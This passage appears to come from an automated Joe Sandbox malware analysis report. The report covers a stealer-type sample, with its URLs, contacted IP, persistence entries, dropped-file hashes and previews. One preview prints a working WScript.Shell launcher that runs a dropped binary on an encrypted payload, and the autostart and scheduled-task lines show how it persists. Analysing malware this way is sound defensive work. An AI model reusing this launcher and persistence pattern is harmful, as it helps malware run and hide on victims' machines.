                                https://stackoverflow.com/q/14436606/2335400000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/mgravell/protobuf-netJ00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://discordapp.com/api/v9/users/MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/mgravell/protobuf-net00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.autoitscript.com/autoit3/XHeroes.com, 00000013.00000000.2366054974.0000000000535000.00000002.00000001.01000000.0000000A.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoScan360.com, 0000001C.00000002.2509765526.00000000007F5000.00000002.00000001.01000000.0000000C.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://nsis.sf.net/NSIS_ErrorErrorupdate.exe, 00000006.00000002.2309139595.0000000000408000.00000002.00000001.01000000.00000007.sdmp, update.exe, 00000006.00000000.2282768835.0000000000408000.00000002.00000001.01000000.00000007.sdmpfalse
                                                  		high
                                                  https://www.autoitscript.com/autoit3/Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.ecosia.org/newtab/MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brMSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.mozilla.org/products/firefoxMSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://james.newtonking.com/projects/json00000123.exe, updatte.exe.0.drfalse
                                                            		high
                                                            http://www.newtonsoft.com/jsonschema00000123.exe, updatte.exe.0.drfalse
                                                              		high
                                                              https://ac.ecosia.org/autocomplete?q=MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.com/mgravell/protobuf-neti00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://stackoverflow.com/q/11564914/23354;00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://stackoverflow.com/q/2152978/2335400000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://icanhazip.com/MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://steamcommunity.com/profiles/MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.nuget.org/packages/Newtonsoft.Json.Bson00000123.exe, updatte.exe.0.drfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  51.81.129.243
                                                                                  		unknownUnited States
                                                                                  		16276OVHFRfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1628000
                                                                                  Start date and time:2025-03-03 13:24:24 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 8s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:39
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:00000123.exe
                                                                                  (renamed file extension from pif to exe)
                                                                                  Original Sample Name:00000123.pif
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@60/35@2/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 60%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 92%
                                                                                  • Number of executed functions: 306
                                                                                  • Number of non-executed functions: 125

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 184.30.131.245, 199.232.214.172, 4.175.87.197, 13.95.31.18, 52.165.164.15, 13.107.246.60
                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, e3913.cd.akamaiedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                  • Execution Graph export aborted for target 00000123.exe, PID 7248 because it is empty
                                                                                  • Execution Graph export aborted for target InstallUtil.exe, PID 1396 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  07:25:51API Interceptor1x Sleep call for process: Heroes.com modified
                                                                                  07:26:30API Interceptor33x Sleep call for process: MSBuild.exe modified
                                                                                  13:25:43AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs
                                                                                  13:25:53Task SchedulerRun new task: GuardianCryptoScan360 path: wscript s>//B "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js"

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  No context

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  s-part-0032.t-0009.t-msedge.nethttps://sharedpdf.zoholandingpage.com/pdfdocsGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 13.107.246.60
                                                                                  door.batGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.60
                                                                                  QBTRN_COMP_Dvsa)_.svgGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 13.107.246.60
                                                                                  Factuur.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.60
                                                                                  email.emlGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.60
                                                                                  https://send.cm/jqisx6yw5pp3Get hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.60
                                                                                  http://www.stage.coopervisionpro.co.ilGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.60
                                                                                  POETDB24-25815.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.60
                                                                                  POETDB24-25815.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.60
                                                                                  DHL INVOICE No. 65419085.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 13.107.246.60
                                                                                  bg.microsoft.map.fastly.netDE 34212 MELSUNGE.docxGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  3s7NimtKaN.batGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.214.172
                                                                                  door.batGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  Factuur.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  https://send.cm/jqisx6yw5pp3Get hashmaliciousUnknownBrowse
                                                                                  • 199.232.214.172
                                                                                  Monetary_policy_report_2025_february.docxGet hashmaliciousSidewinderBrowse
                                                                                  • 199.232.214.172
                                                                                  POETDB24-25815.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  PO-55068 AE.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 199.232.210.172
                                                                                  MasonRootkit.exeGet hashmaliciousXWormBrowse
                                                                                  • 199.232.210.172
                                                                                  DataAnalyzer.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  OVHFRgetscreen-799952897-x86.exeGet hashmaliciousUnknownBrowse
                                                                                  • 51.89.95.37
                                                                                  getscreen-799952897-x86.exeGet hashmaliciousUnknownBrowse
                                                                                  • 51.89.95.37
                                                                                  Payment_Activity_0079_2025-2-23.vbsGet hashmaliciousUnknownBrowse
                                                                                  • 51.222.241.106
                                                                                  getscreen-226997704-x86.exeGet hashmaliciousUnknownBrowse
                                                                                  • 51.89.95.37
                                                                                  Update.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  • 51.79.171.167
                                                                                  Update.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  • 51.79.171.167
                                                                                  owari.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                  • 178.32.95.239
                                                                                  ggetokken.batGet hashmaliciousUnknownBrowse
                                                                                  • 142.44.215.161
                                                                                  ApexLoader.exeGet hashmaliciousUnknownBrowse
                                                                                  • 51.89.7.33
                                                                                  ApexLoader.exeGet hashmaliciousUnknownBrowse
                                                                                  • 51.89.7.33

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    9FB5#U007e1.EXE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      wanscam software ocx setup download.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        wanscam software ocx setup download.exeGet hashmaliciousUnknownBrowse
                                                                                          #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            #Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    #Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\611485\Heroes.com
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):947288
                                                                                                      Entropy (8bit):6.630612696399572
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                      • Filename: 9FB5#U007e1.EXE.exe, Detection: malicious, Browse
                                                                                                      • Filename: wanscam software ocx setup download.exe, Detection: malicious, Browse
                                                                                                      • Filename: wanscam software ocx setup download.exe, Detection: malicious, Browse
                                                                                                      • Filename: #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe, Detection: malicious, Browse
                                                                                                      • Filename: #Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exe, Detection: malicious, Browse
                                                                                                      • Filename: #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe, Detection: malicious, Browse
                                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                      • Filename: #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe, Detection: malicious, Browse
                                                                                                      • Filename: #Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exe, Detection: malicious, Browse
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\611485\Heroes.com
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):229
                                                                                                      Entropy (8bit):4.924376000960641
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:RiJsJHonwWDaJ0/hJkDy4eMu8HMaW1LiGfwWDaJ0/hJkDy4eMuuS:YJSQjW0hF4LiaGWG7W0hF4LXS
                                                                                                      MD5:8E548EE73EA47156F471F85EE1F8107B
                                                                                                      SHA1:519AF4D547F8A924F309B2513DB37DBECCB6273D
                                                                                                      SHA-256:CD5F9F7DEA91333A81CB066C05EA33944995C76E029A0C49DA0BAE5C6B81A716
                                                                                                      SHA-512:A4B1D47F3A5F4ACE37F69307A40F457FD57DA82F97E2B91F6610532155099233AD7218B1A0349F2A529504653F3831FBAD103448A4DAD48C2268DA3C98EE22F0
                                                                                                      Malicious:true
                                                                                                      Preview:new ActiveXObject("Wscript."+"Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CryptoGuard360 Scan Elite Systems Inc\\GuardianCryptoScan360.com\" \"C:\\Users\\user\\AppData\\Local\\CryptoGuard360 Scan Elite Systems Inc\\U\"")

                                                                                                      C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\U

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\611485\Heroes.com
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):765463
                                                                                                      Entropy (8bit):7.9997606128666865
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:12288:5GCzKFazkafToVOm4GRL9pSvQ3ACwpExdTJ+q7AeXzZcvoGneH3pbcfviek3gCX2:5/WFaJkImVxDqQwCw8dt+BeXzlvXpoft
                                                                                                      MD5:E64B4FD591E23A3B9479E107D5CA39A9
                                                                                                      SHA1:30E9FA59391DFCCCD8330FBDD668880C9727FC12
                                                                                                      SHA-256:077978CEE3AD812C7946045A9597A15A880545D82DCA2AE3142B66BBA39C69A5
                                                                                                      SHA-512:0CB9551D2E5E09BD6603C9C81822FC26B5AEC268141A51FF0A832A15B315E5989232E1083298E0EEF29DEB6393A561F7BFBB795E9A298FC85EC126B239932E06
                                                                                                      Malicious:false
                                                                                                      Preview:.B.<...4@>.......5.~d..[....F.~....k.fW.F@Y...}..;*.1+g'.....b.x..C.UO..r7$..`.L.....q.[.M{..R...Q9.X....Cf*.f.........:a.R...V`.x.........:...]n...hR.Xh...q.b).|b...m. ...ZSv..c..........'..#..noW.&B.H....#....J]...6.M[..'..Hq........=.:.}.{.U...!...P[......R.tN]~..8.mg|.."..T.|...g_.....(mFYdev3.$p.y@...u ...@$.....Y%..>.G^./' eW..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rx...G.N.'.F...h................P..T...P..TkC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W....v-...f"...........S...P..Tm........~..5...x..2).U.j.....>.P#.~.|.......|..TD..u-....L.......G..'.}...?.....*op...aV.-Bt...Z.S.!x.....u.I u.......O...7.3..wVs...?L.75.o..M.`^.?X..r

                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1434
                                                                                                      Entropy (8bit):5.342612360333169
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzecKIE4oKNzKoZsXE4qdKqE4Kx1qE4TE4KmJE4j:MxHKlYHKh3oRAHKzectHo60H8HKx1qHd
                                                                                                      MD5:DED544725C0FC4A9C1A4064260007227
                                                                                                      SHA1:C196627F0D20E14F0240201AC995E9BEBC399C29
                                                                                                      SHA-256:82F1B25C0D0DC1B72BFE5E837B668E0087D7E469CCCF909924B72FEC5C1C8F10
                                                                                                      SHA-512:41A800B36C9017CB5B9D427C9AD317ACAC680FCE5FF85391497F6BE489782423B7E22A27CD7211C2E110B5465418747841A42A16C40D1A41A0CD27D192F2A7A5
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen

                                                                                                      C:\Users\user\AppData\Local\Temp\611485\H

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):765463
                                                                                                      Entropy (8bit):7.9997606128666865
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:12288:5GCzKFazkafToVOm4GRL9pSvQ3ACwpExdTJ+q7AeXzZcvoGneH3pbcfviek3gCX2:5/WFaJkImVxDqQwCw8dt+BeXzlvXpoft
                                                                                                      MD5:E64B4FD591E23A3B9479E107D5CA39A9
                                                                                                      SHA1:30E9FA59391DFCCCD8330FBDD668880C9727FC12
                                                                                                      SHA-256:077978CEE3AD812C7946045A9597A15A880545D82DCA2AE3142B66BBA39C69A5
                                                                                                      SHA-512:0CB9551D2E5E09BD6603C9C81822FC26B5AEC268141A51FF0A832A15B315E5989232E1083298E0EEF29DEB6393A561F7BFBB795E9A298FC85EC126B239932E06
                                                                                                      Malicious:true
                                                                                                      Preview:.B.<...4@>.......5.~d..[....F.~....k.fW.F@Y...}..;*.1+g'.....b.x..C.UO..r7$..`.L.....q.[.M{..R...Q9.X....Cf*.f.........:a.R...V`.x.........:...]n...hR.Xh...q.b).|b...m. ...ZSv..c..........'..#..noW.&B.H....#....J]...6.M[..'..Hq........=.:.}.{.U...!...P[......R.tN]~..8.mg|.."..T.|...g_.....(mFYdev3.$p.y@...u ...@$.....Y%..>.G^./' eW..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rx...G.N.'.F...h................P..T...P..TkC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W....v-...f"...........S...P..Tm........~..5...x..2).U.j.....>.P#.~.|.......|..TD..u-....L.......G..'.}...?.....*op...aV.-Bt...Z.S.!x.....u.I u.......O...7.3..wVs...?L.75.o..M.`^.?X..r

                                                                                                      C:\Users\user\AppData\Local\Temp\611485\Heroes.com

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):947288
                                                                                                      Entropy (8bit):6.630612696399572
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\Champion.pps

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64512
                                                                                                      Entropy (8bit):7.997035276350578
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:daeym8VnLbnEucYvheveCUtn7JIX+rHvJ9Y/5Ie6aDVBp:iVnnECvoGCUtneiY16aD7p
                                                                                                      MD5:C34D602E089753122AE7CE255DE74BD2
                                                                                                      SHA1:35E45CE8176F12B077EFB56A1B29EEE134573CFE
                                                                                                      SHA-256:1534DBA22C18D1215CA69E87EDBD7C70F84675A8FD822AF43CB728777B6F8719
                                                                                                      SHA-512:F496E93B148064E4119717EE8967B8170D6AE8F6B895E0700ABA562B7C713A2A88F861F4BCE020B6E7872D2C47592AD0D60AC6099DBF98836ADAF65AE875DDF1
                                                                                                      Malicious:false
                                                                                                      Preview:4Q........z..2....t{.$.de.j....]....,.YV...QW.r..........s..z...nL.,...8t8.S....qB../.l`]j..C-D.b......Y.7V2.U.2..[...H..Z.B.$algw.?.EGp .6._..b.L.tP....AE..j}.%/lN............3..!...rm.n...Y.i.&...2.].m..U/.....^...3./E.J..Y...Y3pY...r......g5c..s;e..6B.....)....D>..+.......'...&...~......5..>..I.....sb.>g....t.G..lt.\D...{.......c..3.8....d.O.&......'.Fc.J.S...+...l..).H.?&..,.RtJ:..X..ke....Id!..g8..!..+.t.1.R.=a...^L8..{......=tp0.........(MA{`2e.@,./..i..0.;..i.6..0....(.T.=..A;..O~.,..(s...0...).[.X.H....(..u..h.....i...N.C..^=.X.(b{.r_.P.yJ...B.S.........8...X.y.*.\.|......,E....bQvd)z...>.5.)A-..Q.^H.....V{..]B.....g7..U...V..u.......^..u......EY.K,.s..S.+..$.Tg.+.u.....:.'.....5..l...v+.+.{...oj?p....e.._6..<!.....w. .X.$....:.f...p..Wk.d......c5FN.r........>.......y...M^%{.3.".P..MTf....~..=.....!Z.3...[.z.3R..!..[...,.......p.Ei..[~_..c.3.".Jjr..0_m..J.)\..a.."QgG......2.S.....o..B./'.)z....&.[.P-..!$..?a....1.... .[..B.....

                                                                                                      C:\Users\user\AppData\Local\Temp\Closely

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):84992
                                                                                                      Entropy (8bit):6.441803958974096
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:V1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDzdE:VZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/a
                                                                                                      MD5:ABFE2AE4D2C4C943D682529B5D0B6BF9
                                                                                                      SHA1:4758ABD740AECCFB642CB76155EF3B8F061DA3CE
                                                                                                      SHA-256:F9B7F6B578BD73092ACA950965735700AE26CB4E072C7CA286C8D38A1EC2E65F
                                                                                                      SHA-512:3BFFA705874A7A87A9889CF61B06C4E0D76579E7C348F9B7216FB6CB0436306739807718FE416DD2AAA317C175AC57687CA1F0D037AB59C583E018468ED5374B
